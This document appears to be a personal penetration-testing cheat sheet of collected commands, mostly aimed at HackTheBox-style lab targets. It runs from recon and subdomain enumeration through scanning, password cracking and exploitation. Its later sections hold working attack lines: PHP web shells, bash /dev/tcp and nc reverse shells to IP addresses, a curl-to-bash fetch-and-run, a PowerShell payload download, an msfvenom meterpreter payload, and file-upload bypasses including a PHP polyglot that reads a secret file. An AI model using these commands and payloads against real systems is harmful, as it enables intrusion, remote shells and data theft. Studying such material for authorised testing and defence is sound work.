Notes

Recon phase

  • Large scope

 - Review latest  [acquisitions](https://www.crunchbase.com/)


 - Get relationships by registrants ([viewdns](https://viewdns.info/reversewhois/))


 - Go to medium scope for each domain

ON Small Domain

  • subfinder -d domainname.com |httpx | gau |uro | gf lfi | tee save-file.txt

DnsDump

Subdomain Enum

  • amass enum -d clicktheclapbutton50timesplz.com

  • sublist3r -d techyrick.com -o file.txt

  • subfinder -d domain.com -all -silent

  • assetfinder assetfinder

  • gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomain

  • echo domain.com | waybackurls | unfurl -u domains

  • gau --subs example.com | unfurl -u domains
  • crt.sh

Technologies

Content Discovery

  • crawley -all -cookie "security=low; PHPSESSID=mlhjkmo9l7slsf8g548pnd4pjn" http://localhost/dvwa > io.txt

  • ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302

  • wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.php

  • gobuster dir -u http://url/ -w wordlists -x php,txt,js -k +{for ssl }

  • dirsearch

Parameters

sub-domain_takeover

  • subzy

     ./subzy run --targets list.txt
    
  • can-i-take-over-xyz.git

==========================================AutomationAndCollected-Command==========================================

Curl

  • curl -X OPTIONS -I [allow HTTP Methods]

fuff

  • ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302
  • ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -mc 200 -s

Wfuzz

gobuster [subdomain]

  • gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain //subdomain

amass

  • amass enum -d clicktheclapbutton50timesplz.com

sublist3r

  • sublist3r -d techyrick.com -o file.txt
  • sublist3r -d techyrick.com -b

nslookup

  • $ nslookup example.com
  • $ nslookup $ip$
  • $ nslookup $ip$ $ip$

dig

  • dig axfr cronos.htb @10.10.10.13
  • dig -x 10.10.10.13 @10.10.10.13

zip2john

  • zip2john your_file.zip > zip.hash

Whatweb

nmap

  • nmap -sn 192.168.1.0/24 //scan networks
  • nmap --top-ports 1000 $ip
  • nmap -iL list.txt
  • nmap -A -T4 cloudflare.co
  • nmap -sV localhost
  • nmap -p- -pn -vv -T4 -n $ip
  • nmap --top-ports 100 -A -sV -T4 $ip
  • sudo nmap -sSVC -p-10000 $ip$

rustscan || like nmap

  • rustscan -a 10.129.184.36 --ulimit 5000 -- -A

tcpdump

  • tcpduo -i tun0 port 1389

bettercap

  • sudo bettercap
  • net.probe on
  • net.show

waybackurls

  • cat program.txt | waybackurls >> urls.txt //For target scope

Impaket-server

  • > sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
  • ? copy \\10.21.28.143\kali\reverse.exe C:\PrivEsc\reverse.exe

nuclei

  • cat program.txt | nuclei

password

  • mkpasswd -m sha-512 Password1234

John the Ripper

  • john --wordlists=/usr/share/wordlist/rockyou.txt john.txt
  • john john.txt --show

Docker

  • sudo ddocker run --rm -i $Container/Name$

Metasploit

  • search type:exploit name:smb platform:windows

searchsploit

searchsploit -m %path/file%

Upload File on Victem

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.105:8000/MS10-059.exe', 'MS10-059.exe')"

PayLoad

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f exe > writeup.exe

hydra

hydra -l none -P rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V

crackmapexec

  • crackmapexec smb solarlab.htb -u blake -p pass.txt

wpscan

  • wpscan --url example.com

HttpX

  • httpx -ssc -td -title -fhr -location -pa

FOR iiS USE shortscan

Collect IP's

  • shodan.io

  • cencys,fofa,zommeye and all using

File_Permitions

  • chmod a+rx filename

  • sudo shown www-data: /file/pass/

file_uploadbypass

========================

Content-Disposition: form-data; name="avatar"; filename=".htaccess" Content-Type: text/plain

AddType application/x-httpd-php .tez

========================

Content-Type: image/jpeg

========================

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ink.png -o polyglot.php

========================

test.php%00.jpg

========================

Lab: Web shell upload via race condition

========================

==========================================NOTE&TIPS==========================================

  • DOMAINS divide into ==> info,api,dev,admin,stage..

  • etc on Windows ==> C:\Windows\System32\drivers\etc\passwd

  • ssh on windows ==> C:\Users\YourUsername\.ssh

  • Shell_UP ==> python3 -c 'import pty;pty.spawn("/bin/bash")'

  • Shell_UP ==> script /dev/null -c bash

  • shell.sh ==> bash -c 'bash -i >& /dev/tcp/10.10.16.49/5555 0>&1'

  • shell==> ?php system($_GET["cmd"]); ?>

  • shell.php ==> ?php echo shell_exec($_GET['e'].' 2>&1'); ?>

  • shell==> nc -e /bin/bash 10.10.10.10 5555

  • shell.sh==>

    #!/bin/bash

    bash -i >& /dev/tcp/10.21.28.143/5555 0>&1

  • THEN==> http://site.htb/shell.php?cmd=curl%20:8000/shell.sh|bash



نموذج الاتصال